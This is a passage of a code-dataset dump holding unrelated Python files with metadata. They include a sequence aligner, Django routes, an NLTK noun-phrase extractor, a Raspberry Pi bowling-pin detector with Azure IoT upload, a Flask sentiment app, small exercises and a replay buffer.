(Ix[i-1][j-1] + match),\\\r\n (Iy[i-1][j-1] + match))\r\n\r\n return M, Ix, Iy\r\n\r\ndef backtrace(P, Q, M, Ix, Iy, gape_open, gape_ext, A, R):\r\n nrow = len(Q)\r\n ncol = len(P)\r\n mx_score = M[nrow][ncol]\r\n cur_m = 'M'\r\n if mx_score < Ix[nrow][ncol]:\r\n mx_score = Ix[nrow][ncol]\r\n cur_m = 'Ix'\r\n if mx_score < Iy[nrow][ncol]:\r\n mx_score = Iy[nrow][ncol]\r\n cur_m = 'Iy'\r\n sequ1 = ''\r\n sequ2 = ''\r\n i = len(Q)\r\n j = len(P)\r\n while (i>0 or j>0):\r\n if cur_m == 'M':\r\n match = R[A.index(Q[i-1])][A.index(P[j-1])]\r\n sequ1 += P[j-1]\r\n sequ2 += Q[i-1]\r\n i -= 1; j -= 1\r\n if (Ix[i][j] + match) == M[i+1][j+1]:\r\n cur_m = 'Ix'\r\n elif (Iy[i][j] + match) == M[i+1][j+1]:\r\n cur_m = 'Iy'\r\n else:\r\n cur_m = 'M'\r\n elif cur_m == 'Ix': \r\n sequ1 += '-'\r\n sequ2 += Q[i-1]\r\n i -= 1\r\n if (M[i][j] + gape_open) == Ix[i+1][j]:\r\n cur_m = 'M'\r\n elif (Iy[i][j] + gape_open) == Ix[i+1][j]:\r\n cur_m = 'Iy'\r\n else:\r\n cur_m = 'Ix'\r\n else: \r\n sequ1 += P[j-1]\r\n sequ2 += '-'\r\n j -= 1\r\n if (M[i][j] + gape_open) == Iy[i][j+1]:\r\n cur_m = 'M'\r\n elif (Ix[i][j] + gape_open) == Iy[i][j+1]:\r\n cur_m = 'Ix'\r\n else:\r\n cur_m = 'Iy'\r\n \r\n sequ1r = ''.join(reversed(sequ1))\r\n sequ2r = ''.join(reversed(sequ2))\r\n\r\n return mx_score, sequ1r, sequ2r\r\n \r\nD, E = map(int, input().split())\r\nA = input()\r\nsize = len(A)\r\nR = []\r\nfor i in range(size):\r\n R.append([int(i) for i in input().split()])\r\nP = input().rstrip()\r\nQ = input().rstrip()\r\n\r\n#import numpy\r\nncol, nrow = len(P) + 1, len(Q) + 1\r\nM, Ix, Iy = init_matrix(nrow, ncol, D, E)\r\nM, Ix, Iy = distance_matrix(P, Q, M, Ix, Iy, D, E, A, R)\r\n#print(numpy.array(backtrack))\r\nscore, str1, str2 = backtrace(P, Q, M, Ix, Iy, D, E, A, R)\r\n\r\nprint(score)\r\nprint(str1)\r\nprint(str2)\r\n","sub_path":"ШЦЭ 2019 Биоинформатика/Выравнивание строк.py","file_name":"Выравнивание строк.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"326875911","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom workspaces import views\n\n\nurlpatterns = [\n url(r'', include('social.apps.django_app.urls', namespace='social')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', views.home_page, name='homepage'),\n url(r'^users/$', views.UserList.as_view(), name='users'),\n url(r'^users/(?P[-\\w]+)$', views.user_detail, name='user'),\n url(r'^settings$', views.user_settings, name='user_settings'),\n url(r'^photos/', include('photo.urls', namespace='photo')),\n url(r'^logout/', views.logout, name='logout'),\n]\n\n\nif settings.DEBUG:\n from django.conf import settings\n urlpatterns += url(r'^media/(?P.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),\n","sub_path":"workspaces/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"612139875","text":"import nltk\nfrom nltk.corpus import brown\nfrom nltk.corpus import stopwords\n\nbrown_train = brown.tagged_sents(categories='news')\nregexp_tagger = nltk.RegexpTagger(\n [(r'^-?[0-9]+(.[0-9]+)?$', 'CD'),\n (r'(-|:|;)$', ':'),\n (r'\\'*$', 'MD'),\n (r'(The|the|A|a|An|an)$', 'AT'),\n (r'.*able$', 'JJ'),\n (r'^[A-Z].*$', 'NNP'),\n (r'.*ness$', 'NN'),\n (r'.*ly$', 'RB'),\n (r'.*s$', 'NNS'),\n (r'.*ing$', 'VBG'),\n (r'.*ed$', 'VBD'),\n (r'.*', 'NN')\n 
])\nunigram_tagger = nltk.UnigramTagger(brown_train, backoff=regexp_tagger)\nbigram_tagger = nltk.BigramTagger(brown_train, backoff=unigram_tagger)\ncfg = {}\ncfg["NNP+NNP"] = "NNP"\ncfg["NN+NN"] = "NNI"\ncfg["NNI+NN"] = "NNI"\ncfg["JJ+JJ"] = "JJ"\ncfg["JJ+NN"] = "NNI"\n\nclass NPExtractor(object):\n    def __init__(self, sentence):\n        self.sentence = sentence\n\n    def tokenize_sentence(self, sentence):\n        tokens = nltk.word_tokenize(sentence)\n        return tokens\n\n    def normalize_tags(self, tagged):\n        n_tagged = []\n        for t in tagged:\n            if t[1] == "NP-TL" or t[1] == "NP":\n                n_tagged.append((t[0], "NNP"))\n                continue\n            if t[1].endswith("-TL"):\n                n_tagged.append((t[0], t[1][:-3]))\n                continue\n            if t[1].endswith("S"):\n                n_tagged.append((t[0], t[1][:-1]))\n                continue\n            n_tagged.append((t[0], t[1]))\n        return n_tagged\n\n    def extract(self,stop_list):\n        tokens = self.tokenize_sentence(self.sentence)\n\n        stop_words = set(stop_list+stopwords.words('english'))\n\n        # filtered_sentence = [w for w in tokens if not w in stop_words]\n        # print(filtered_sentence)\n\n        filtered_sentence = tokens\n        # filtered_sentence = []\n        #\n        # for w in tokens:\n        #     if w not in stop_words:\n        #         filtered_sentence.append(w)\n        # print(filtered_sentence)\n\n        tags = self.normalize_tags(bigram_tagger.tag(filtered_sentence))\n        merge = True\n        while merge:\n            merge = False\n            for x in range(0, len(tags) - 1):\n                t1 = tags[x]\n                t2 = tags[x + 1]\n                key = "%s+%s" % (t1[1], t2[1])\n                value = cfg.get(key, '')\n                if value:\n                    merge = True\n                    tags.pop(x)\n                    tags.pop(x)\n                    match = "%s %s" % (t1[0], t2[0])\n                    pos = value\n                    tags.insert(x, (match, pos))\n                    break\n        matches = []\n        for t in tags:\n            if t[1] == "NNP" or t[1] == "NNI":\n                matches.append(t[0])\n        return matches\n\n\ndef main():\n\n    item_list = []\n    stop_list = []\n    with open('englishWord.txt') as f:\n        results = f.readlines()\n        for res in results:\n            item_list.append(res.strip())\n\n    with open('stopWords.txt') as f:\n        results = f.readlines()\n        for res in results:\n            stop_list.append(res.strip())\n\n    for sentence in item_list:\n        print(sentence)\n        np_extractor = NPExtractor(sentence)\n        result = np_extractor.extract(stop_list)\n        # print(result)\n        endResult = []\n        for res in result:\n            if len(res.split(' ')) == 1:\n                continue\n            res = res.replace('','')\n            endResult.append(res)\n        print(endResult)\n        with open('结果.txt','a') as f:\n            f.write(sentence+'\\n'+str(endResult)+'\\n')\n\n\n\nif __name__ == '__main__':\n    main()","sub_path":"homeWork/wordAnaly/splitWord.py","file_name":"splitWord.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"52813100","text":"def anti_vowel(x):\n    x_list = list(x)\n    vowels = ['a','e','i', 'o', 'u']\n    # iterate over a copy so that removing a letter does not skip the next one,\n    # and use a membership test instead of comparing a letter to the whole list\n    for letter in list(x_list):\n\n        if (letter.lower() in vowels):\n            x_list.remove(letter)\n    x = ''.join(x_list)\n    return x\n\nprint(anti_vowel("It has been a long time."))\n","sub_path":"anti_vowel.py","file_name":"anti_vowel.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"477001214","text":"# import the necessary packages\n\nimport time\nimport cv2\nimport numpy\nimport RPi.GPIO as GPIO\nimport Iothub_client_functions as iot\nimport picamera\nimport io\n# from picamera import PiCamera, Color\nfrom picamera.array import PiRGBArray\nimport picamera.array\nfrom PIL import Image\n\npinsGPIO = [15,14,3,2,21,20,16,5,26,6]\n# 
mask_crop_ranges = ([1100,1700, 220,2800],[0,0,0,0])\npin_crop_ranges = ([220,246,242,268],[197,223,221,247],[197,223,291,317],[177,203,202,228],[177,203,268,294],\n [177,203,268,294],[160,186,189,215],[161,187,246,272],[161,187,306,332],[160,186,369,395])\n\ndef setResolution():\n resX = 640\n resY = 480\n res = (int(resX), int(resY))\n return res\ndef setupGPIO(pins):\n GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n for pin in pins:\n GPIO.setup(pin,GPIO.OUT)\n print (\"setup Completed\")\n\ndef bit_GPIO(pins,pinCount):\n bits = \"{0:b}\".format(pinCount)\n while len(bits)<10:\n bits = \"0\"+bits\n for idx in range(0,len(bits)):\n if(bits[idx]==\"1\"):\n GPIO.output(pins[idx], GPIO.HIGH)\n else:\n GPIO.output(pins[idx], GPIO.LOW)\n\ndef writeImageSeries(frameNoStart, numberOfFrames, img_rgb):\n if frameNoStart <= frameNo:\n if frameNo <= frameNoStart+numberOfFrames:\n print ('Saving ../home/pi/Shared/videos/videoCCEFrame'+ str(frameNo) +'.jpg')\n cv2.imwrite('/home/pi/Shared/videos/videoCCEFrame'+ str(frameNo) +'.jpg',img_rgb)\n\ndef write_video(stream):\n# Write the entire content of the circular buffer to disk. No need to\n# lock the stream here as we're definitely not writing to it\n# simultaneously\n global motion_filename, frameNo, videoReadyFrameNo\n \n if frameNo1000:\n setterPresent = True\n firstSetterFrame = frameNo\n if setterPresent:\n activity = activity + str(priorPinCount)+ ',-2,'\n print(\"Green\", area, frameNo)\n else:\n firstSetterFrame = 0\n\ndef isResetArm():\n global firstArmFrame, armPresent, ballCounter\n global frameNo\n global img_rgb\n global img_gray1arm\n global threshArm\n frame2arm = img_rgb[160:280,440:480]\n img_gray2arm = cv2.cvtColor(frame2arm, cv2.COLOR_BGR2GRAY)\n diff = cv2.absdiff(img_gray1arm,img_gray2arm)\n # First value reduces noise. Values above 150 seem to miss certain ball colors\n ret, threshArm = cv2.threshold(diff, 120,255,cv2.THRESH_BINARY)\n frame = threshArm\n # Blur eliminates noise by averaging surrounding pixels. 
Value is array size of blur and MUST BE ODD\n threshArm = cv2.medianBlur(threshArm,15)\n print(type(img_rgb), type(frame2arm), type(threshArm), type(diff),type(img_gray1arm), type(img_gray2arm))\n cnts = cv2.findContours(threshArm.copy(), cv2.RETR_EXTERNAL,\n\t\tcv2.CHAIN_APPROX_SIMPLE)[-2]\n center = None\n radius = 0\n if len(cnts) > 0:\n\t\t# find the largest contour in the mask, then use\n\t\t# it to compute the minimum enclosing circle and centroid\n c = max(cnts, key=cv2.contourArea)\n ((xContour, yContour), radius) = cv2.minEnclosingCircle(c)\n if radius>15:\n print('Reset Arm', radius, frameNo, len(cnts))\n firstArmFrame = frameNo\n armPresent = True\n ballCounter = 0\n\ndef arm():\n global firstArmFrame\n global frameNo\n firstArmFrame = frameNo\n\ndef findPins():\n global x,x1,y,y1\n global priorPinCount\n global img_rgb\n global frame2\n pinCount = 0\n crop = []\n sumHist = [0,0,0,0,0,0,0,0,0,0]\n lower_red = numpy.array([0,0,70]) # lower_red = np.array([0,100,0])\n upper_red = numpy.array([110, 110, 255]) # upper_red = np.array([180,255,255])\n\n mask = cv2.inRange(img_rgb,lower_red,upper_red)\n output = cv2.bitwise_and(img_rgb, img_rgb, mask=mask)\n threshold1 = 10\n threshold2 = 10\n for i in range(0,6):\n crop.append(output[pin_crop_ranges[i][0]+y:pin_crop_ranges[i][1]+y1,pin_crop_ranges[i][2]+x:pin_crop_ranges[i][3]+x1])\n hist = cv2.calcHist([crop[i]],[1],None,[4], [10,50])\n sumHist[i] = hist[0]+hist[1]+hist[2]+hist[3]\n \n \n print (i, sumHist[i])\n if threshold1 < sumHist[i]:\n pinCount = pinCount + 2**(9-i)\n for i in range(6,10):\n crop.append(output[pin_crop_ranges[i][0]+y:pin_crop_ranges[i][1]+y1,pin_crop_ranges[i][2]+x:pin_crop_ranges[i][3]+x1])\n hist = cv2.calcHist([crop[i]],[1],None,[4], [10,50])\n sumHist[i] = hist[0]+hist[1]+hist[2]+hist[3]\n \n \n print (i, sumHist[i])\n if threshold2 < sumHist[i]:\n pinCount = pinCount + 2**(9-i)\n \n print('HIST', frameNo, pinCount)\n bit_GPIO(pinsGPIO,pinCount)\n\n if priorPinCount == pinCount:\n return False\n else:\n write_video(stream)\n priorPinCount = pinCount\n return True\n\ndef iotSend(buf):\n global frameNo\n try:\n client = iot.iothub_client_init()\n # if client.protocol == IoTHubTransportProvider.MQTT:\n print ( \"IoTHubClient is reporting state\" )\n reported_state = \"{\\\"newState\\\":\\\"standBy\\\"}\"\n client.send_reported_state(reported_state, len(reported_state), iot.send_reported_state_callback, iot.SEND_REPORTED_STATE_CONTEXT)\n filename = \"vidforblob\" + str(frameNo) + \".h264\"\n f = open(buf, \"rb+\")\n content = f.read()\n \n print(\"CONTENT LEN\", len(content), type(content))\n client.upload_blob_async(filename,content, len(content), iot.blob_upload_conf_callback,1001)\n\n\n except iot.IoTHubError as iothub_error:\n print ( \"Unexpected error %s from IoTHub\" % iothub_error )\n return\n except KeyboardInterrupt:\n print ( \"IoTHubClient sample stopped\" )\n\n iot.print_last_message_time(client) \n\nsetupGPIO(pinsGPIO)\nsetterPresent = False\narmPresent = False\nmaskFrame = True\npriorPinCount = 0\nactivity = \"\\r\\n\"\nx=0\nx1=0 +x\ny=0\ny1=0 + y\ncrop_ranges = ([300,470,5,450],[0,0,0,0])\nballCoords=[0]*100\nframeNo = 0\nprevFrame = 0\nballCounter = 0\nballCounterFrame = 0\nvideoReadyFrameNo = 0\norigCounter = 0\npinReactionTime = 0\npinReactionFlag = False\nvideo_preseconds = 3\nmotion_width = 640\nmotion_height = 480\nmotion_filename = \"DPBetaCIOTest\"\nfor i in range(0,1):\n a =(int(crop_ranges[i][2])+x,int(crop_ranges[i][0])+y)\n b = (int(crop_ranges[i][3])+x1, 
int(crop_ranges[i][1])+y1)\nwith picamera.PiCamera() as camera:\n camera.resolution = setResolution()\n camera.framerate = 25\n camera.video_stabilization = True\n camera.annotate_background = True\n camera.rotation = 180\n rawCapture = PiRGBArray(camera, size=camera.resolution)\n # setup a circular buffer\n # stream = picamera.PiCameraCircularIO(camera, seconds = video_preseconds)\n stream = picamera.PiCameraCircularIO(camera, size = 1000000)\n # video recording into circular buffer from splitter port 1\n camera.start_recording(stream, format='h264', splitter_port=1)\n #camera.start_recording('test.h264', splitter_port=1)\n # low resolution motion vector analysis from splitter port 2\n camera.start_recording('/dev/null', splitter_port=2, resize=(motion_width,motion_height) ,format='h264')\n # wait some seconds for stable video data\n camera.wait_recording(2, splitter_port=1)\n motion_detected = False\n\n print(camera.resolution)\n time.sleep(1)\n for frame in camera.capture_continuous(rawCapture,format=\"bgr\", use_video_port=True):\n # grab the raw NumPy array representing the image, then initialize the timestamp\n # and occupied/unoccupied text\n rawCapture.truncate()\n rawCapture.seek(0)\n \n frame2 = frame.array\n if maskFrame:\n frame1 = frame.array\n # mask= frame1[650:900, 250:1500]\n # mask= frame1[500:900, 100:1240]\n mask = frame1[300:470,5:450]\n # mask = frame1[300,470,5,450]\n frame1 = mask\n maskFrame = False\n continue\n frameNo = frameNo +1\n img_rgb = frame2\n frame1arm = frame2[160:280,440:480]\n img_gray1arm = cv2.cvtColor(frame1arm, cv2.COLOR_BGR2GRAY)\n # cv2.imwrite('../videos/videoCCEFrame'+ str(frameNo) +'.jpg',img_rgb)\n # if pinReactionFlag:\n # if time.process_time()-3 > pinReactionTime:\n \n # activity = activity + str(priorPinCount)+','\n # print(activity)\n # pinReactionFlag = False\n\n # # if setterPresent:\n # # if firstSetterFrame + 60 > frameNo:\n # # continue\n # if armPresent:\n # if firstArmFrame + 70 > frameNo:\n # continue\n # if firstArmFrame+ 70 == frameNo:\n # armPresent = False\n # activity = activity + str(priorPinCount)+ ',-1,'\n if setterPresent:\n if firstSetterFrame + 120 > frameNo:\n continue\n if armPresent:\n if firstArmFrame + 120 > frameNo:\n continue\n if firstArmFrame+ 120 == frameNo:\n ballCounter = 0\n armPresent = False\n if setterPresent or armPresent:\n continue\n isPinSetter()\n isResetArm()\n \n # frame2= frame2[320:480,40:565]\n \n # frame2= frame2[650:900, 250:1500]\n frame2= frame2[300:470,5:450]\n img_gray1 = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)\n img_gray2 = cv2.cvtColor(frame2, cv2.COLOR_BGR2GRAY)\n diff = cv2.absdiff(img_gray1,img_gray2)\n # First value reduces noise. Values above 150 seem to miss certain ball colors\n ret, thresh = cv2.threshold(diff, 120,255,cv2.THRESH_BINARY)\n frame = thresh\n # Blur eliminates noise by averaging surrounding pixels. 
Value is array size of blur and MUST BE ODD\n        thresh = cv2.medianBlur(thresh,13)\n        cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,\n            cv2.CHAIN_APPROX_SIMPLE)[-2]\n        center = None\n        radius = 0\n        if len(cnts) > 0:\n            # find the largest contour in the mask, then use\n            # it to compute the minimum enclosing circle and centroid\n            c = max(cnts, key=cv2.contourArea)\n            # ((xContour, yContour), radius) = cv2.minEnclosingCircle(c)\n            print('Ball Area', frameNo, len(cnts))\n            if prevFrame + 15 < frameNo:\n                ballCounter = ballCounter + 1\n                print("BALLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL", ballCounter)\n                prevFrame = frameNo\n        # only proceed if the radius meets a minimum size\n            # if radius > 5:\n            #     # draw the circle and centroid on the frame,\n            #     # then update the list of tracked points\n            #     M = cv2.moments(c)\n            #     center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))\n            #     cv2.drawContours(img_gray2, cnts, -1, (0,255,0), 3)\n            #     if prevFrame + 15 < frameNo:\n            #         ballCounter = ballCounter + 1\n            #         prevFrame = frameNo\n            #     print('BALL CENTER',center, radius, frameNo, len(cnts), ballCounter)\n        \n        # cv2.imwrite('P:videos/cv2Img'+str(frameNo)+'.jpg',img_gray2)\n        img_gray1=img_gray2 \n        cv2.imshow('Ball', img_gray2)\n        cv2.imshow('Arm', threshArm)\n        # cv2.imshow('Thresh' , thresh)\n        camera.annotate_text = "Date "+ str(time.process_time()) + " Frame " + str(frameNo) + " Prior " + str(priorPinCount)\n        # writeImageSeries(20, 3, img_rgb)\n        # cv2.imshow('Frame' , img_rgb)\n        if frameNo%5 ==0:\n            tf = findPins() \n\n        # cv2.rectangle(img_rgb,b, a, 255,2)\n\n        # cv2.imshow('IMG_RGB with Ball Rect', img_rgb)\n        # writeImageSeries(135,20)\n        \n        key = cv2.waitKey(1) & 0xFF\n        \n        # if the `q` key was pressed, break from the loop\n        if key == ord("q"):\n            break\n","sub_path":"DPBetaCircIO640.py","file_name":"DPBetaCircIO640.py","file_ext":"py","file_size_in_byte":13756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"243965224","text":"from flask import *\nimport numpy as np\nimport pandas as pd\nimport re\nimport string\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import load_model\n\napp = Flask(__name__)\napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\n\n\ndata = pd.read_csv('D:\\\\PycharmProject\\\\SentimentAnalysisGui\\\\static\\\\TweetsText.csv')\ndata = data[data['airline_sentiment'] != 'neutral']\n\n\ndef clean_tweet(text):\n    # chain each substitution on the running result instead of re-applying it to the original text\n    tweet = re.sub('[' + string.punctuation + ']', '', text)\n    tweet = re.sub(r"http\\S+|www\\S+|https\\S+", '', tweet, flags=re.MULTILINE)\n    # Remove user @ references and '#' from tweet\n    tweet = re.sub(r'\\@\\w+|\\#', '', tweet)\n    return tweet\n\ndata['text'] = data['text'].apply(lambda x: clean_tweet(x))\n\nfor idx, row in data.iterrows():\n    row[0] = row[0].replace('rt', '')\n\nmax_fatures = 2000\ntokenizer = Tokenizer(num_words=max_fatures, split=' ')\ntokenizer.fit_on_texts(data['text'].values)\nX = tokenizer.texts_to_sequences(data['text'].values)\npad_sequences(X)\n\nbaslik = ("Cümle", "Duygu Tahmini")\n\nsentenceList = []\nsentimentList = []\n@app.route('/', methods=['GET', 'POST'])\ndef sentiment_analyisis():\n    if request.method == 'POST':\n        sentence = request.form['sentimentText']\n        sentenceList.clear()\n        sentimentList.clear()\n        sentenceList.append(sentence)\n        result(sentence)\n\n    return render_template('index.html', headings=baslik, k=sentenceList, l=sentimentList)\n\n\ndef result(text):\n    try:\n\n        if text == '':\n            flash("Try 
Again...\", \"warning\")\n else:\n tweet = [text]\n tweet = tokenizer.texts_to_sequences(tweet)\n tweet = pad_sequences(tweet, maxlen=29, dtype='int32', value=0)\n model = load_model('D:\\\\PycharmProject\\\\SentimentAnalysisGui\\\\static\\\\best_model.h5')\n sentiment = model.predict(tweet, batch_size=1, verbose=0)[0]\n if (np.argmax(sentiment) == 0):\n # print(\"negative\")\n flash(\"Negative Sentence\", \"danger\")\n sentimentList.append('Negative Sentence')\n\n elif (np.argmax(sentiment) == 1):\n # print(\"positive\")\n flash(\"Positive Sentence\", \"success\")\n sentimentList.append('Positive Sentence')\n\n except BaseException as ex:\n print(ex)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"SentimentAnalysisGui/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"336902159","text":"def main():\n # Part 1\n schools1 = {'USC':'Lost Angeles','Oregon':'Eugene',\n 'Arizona':'Tempe','Utah':'Salt Lake City'}\n\n schools2 = {'USC':'Trojans','Oregon':'Ducks','Arizona':'Wildcats',\n 'Utah':'Utes'}\n again = 'y'\n while again.lower() == 'y':\n school = input(\"Enter the name of school: \")\n if school in schools1:\n print(school, 'Location:',schools1[school],'Nickname:',schools2[school])\n else:\n print(\"That school is invalid.\")\n\n again = input(\"Wanna do this again? (y/n) \")\n # Part 2\n medals = {'Norway':[14,14,11],'Germany':[14,10,7],'Canada':[11,8,10]}\n medals['USA'] = [9,8,6]\n medals['Netherlands'] = [8,6,6]\n medals['Sweden'] = [7,6,1]\n print('Medal Count for 2018 Winter Olympics')\n displayData(medals)\n countries = medals.keys()\n for c in countries:\n print(c, ' ',end='')\n print()\n lists = medals.values()\n print(lists)\n for x in lists:\n print(x)\n sweden = medals.pop(\"Sweden\",\"Not in the list\")\n print(\"Sweden data:\",sweden)\n print(\"New Medal Count for 2018 Winter Olympics\")\n displayData(medals)\n\ndef displayData(d):\n for key in d:\n print(key,'won',d[key][0],'gold medals,',d[key][1],'silver medals, and',\n d[key][2],'bronze medals')\n \nmain()","sub_path":"ICA/Ch9Pt1.py","file_name":"Ch9Pt1.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"541137076","text":"import sys\n\n#compatibility\ntry: input = raw_input\nexcept NameError: pass\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n \ncolors = { \n 'GREEN': bcolors.OKGREEN,\n 'BLUE': bcolors.OKBLUE,\n 'MAGENTA': bcolors.HEADER,\n 'PURPLE': bcolors.HEADER,\n 'YELLOW': bcolors.WARNING,\n 'RED': bcolors.FAIL,\n 'NONE': bcolors.ENDC\n}\n\nattribs = {\n 'BOLD' : bcolors.BOLD,\n 'UNDERLINE': bcolors.UNDERLINE,\n}\n\nexit_cond = lambda x: x in {'q', 'quit', 'leave', 'exit'}\n\ndef set_exit_cond(condition):\n global exit_cond\n exit_cond = condition\n\ndef get_char(s, char_list):\n while( True ):\n string = input(s)\n if exit_cond(string):\n return None\n\n if string in char_list:\n return string\n\ndef get_number(s, max_val=None):\n\n while( True ):\n try:\n string = input(s)\n if exit_cond(string):\n return None\n val = int(string)\n if max_val is None or val <= max_val:\n return val\n except:\n print ('Not a number. 
Try again')\n    \ndef get_string(s):\n    string = input(s)\n    if exit_cond(string):\n        return None\n    return string\n\ndef get_word(s):\n    string = input(s)\n    if exit_cond(string):\n        return False\n    return True\n\ndef ask_addition_question(m, n):\n    for i in range(1, 4):\n        result = get_number(str(m) + ' + ' + str(n) + ' = ')\n        if result == None:\n            return -1\n        \n        if result == (m+n):\n            print ('Correct !')\n            return 1\n        else:\n            print ('Wrong. try again!')\n        \n    return 0\n    \ndef ask_multiplication_question(m, n):\n    for i in range(1, 4):\n        result = get_number(str(m) + ' x ' + str(n) + ' = ')\n        if result == None:\n            return -1\n        \n        if result == (m*n):\n            print ('Correct !')\n            return 1\n        else:\n            print ('Wrong. try again!')\n        \n    return 0\n    \ndef ask_subtraction_question(m, n):\n    for i in range(1, 4):\n        if m < n:\n            m, n = n, m\n        result = get_number(str(m) + ' - ' + str(n) + ' = ')\n        if result == None:\n            return -1\n        \n        if result == (m-n):\n            print ('Correct !')\n            return 1\n        else:\n            print ('Wrong. try again!')\n        \n    return 0\n    \ndef ask_word_question(word):\n    return get_word(' ' + word + ' ')\n\ndef write(text, color=None, *attrib):\n\n    prefix = ''\n    sufix = ''\n    if not color is None:\n        prefix += colors[color.upper()]\n    for at in attrib:\n        prefix += attribs[at.upper()]\n    \n    if len(prefix) > 0:\n        sufix = colors['NONE']\n\n    print (prefix + text + sufix)\n    \n","sub_path":"math/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"614217004","text":"# 2579.py\n# 2018.05.27\n\nimport sys\n\nr = sys.stdin.readline\n\ndef cal(p, p_len):\n\tif p_len < 3:\n\t\treturn sum(p)\n\tdp = [0, p[1], p[1]+p[2]]\n\tfor n in range(3, p_len+1):\n\t\tn_val = max(dp[n-2] + p[n], dp[n-3] + p[n-1] + p[n])\n\t\tdp.append(n_val)\n\treturn dp[p_len]\n\nn = int(r())\np = [0] + [int(r()) for _ in range(n)]\nrst = cal(p, n)\nprint(rst)\n\n# dp[n] : the maximum total score obtainable in the stair-climbing game when there are N stairs\n# dp[n] = max(dp[n-2]+p[n], dp[n-3]+p[n-1]+p[n])\n\n","sub_path":"2000/2579.py","file_name":"2579.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"502790102","text":"\ndef cycles(start, graph):\n    visited = [0] * (graph.no_nodes+1)\n    pred = [0] * (graph.no_nodes+1)\n    det_cycle(start, graph, visited, pred)\n\n\ndef det_cycle(start, graph, visited, pred):\n    visited[start] = 1\n    for i in graph.a[start]:\n        if visited[i] == 0:\n            pred[i] = start\n            det_cycle(i, graph, visited, pred)\n            visited[i] = 2\n        elif i != pred[start] and visited[i] != 2:\n            write_cycle(start, i, pred)\n\n\ndef write_cycle(p, c, pred):\n\n    cycle = [p]\n    node = p\n    while c != node:\n        node = pred[node]\n        cycle.append(node)\n\n    print(cycle)\n","sub_path":"resources/determine_cycles.py","file_name":"determine_cycles.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"107062756","text":"from ui.OptionUI import OptionUI\nfrom controllers.MemberController import member_controller\nfrom controllers.MemberController import ORDER_BY_NAME, ORDER_BY_SPORT, ORDER_BY_AGE\nfrom ui.MemberSelectUI import MemberSelectUI\n\nclass ListAllMembersUI(OptionUI):\n\n    def __init__(self):\n        super().__init__("List all members")\n\n    def options(self):\n        return [self.ListMembersByOrder(ORDER_BY_NAME, "name"), \n                self.ListMembersByOrder(ORDER_BY_AGE, "age"), \n                
self.ListMembersByOrder(ORDER_BY_SPORT, "sport")]\n\n    class ListMembersByOrder(OptionUI):\n\n        def __init__(self, number, order_str):\n            super().__init__(f"Order by {order_str}")\n            self.number = number\n\n        def options(self):\n            members = member_controller.get_all_members(self.number)\n            ret = []\n            for member in members:\n                if isinstance(member[1], list):\n                    for memb in member[1]:\n                        ret.append(MemberSelectUI(memb, str(member[0])))\n                else:\n                    ret.append(MemberSelectUI(member[1], str(member[0])))\n            return ret\n\n\n\n","sub_path":"ui/ListAllMembersUI.py","file_name":"ListAllMembersUI.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"145917053","text":"import numpy as np\r\nimport random\r\nfrom config import *\r\nfrom utils import SumTree\r\nimport torch\r\nimport bisect\r\n\r\n\r\nclass ReplayBuffer(object):\r\n    def __init__(self, capacity, batch_size=64):\r\n        self.capacity = capacity\r\n        self.memory = [None for _ in range(capacity)]\r\n        self.ind_max = 0\r\n\r\n    def remember(self, transition):\r\n        ind = self.ind_max % self.capacity\r\n        self.memory[ind] = transition\r\n        self.ind_max += 1\r\n\r\n    def sample(self, k):\r\n        '''\r\n        return sampled transitions. Make sure that there are at least k transitions stored before calling this method\r\n        '''\r\n        index_set = random.sample(list(range(len(self))), k)\r\n        states = torch.from_numpy(np.vstack([self.memory[ind][0] for ind in index_set])).float()\r\n        actions = torch.from_numpy(np.vstack([self.memory[ind][1] for ind in index_set])).long()\r\n        rewards = torch.from_numpy(np.vstack([self.memory[ind][2] for ind in index_set])).float()\r\n        next_states = torch.from_numpy(np.vstack([self.memory[ind][3] for ind in index_set])).float()\r\n        dones = torch.from_numpy(np.vstack([self.memory[ind][4] for ind in index_set]).astype(np.uint8)).float()\r\n\r\n        return states, actions, rewards, next_states, 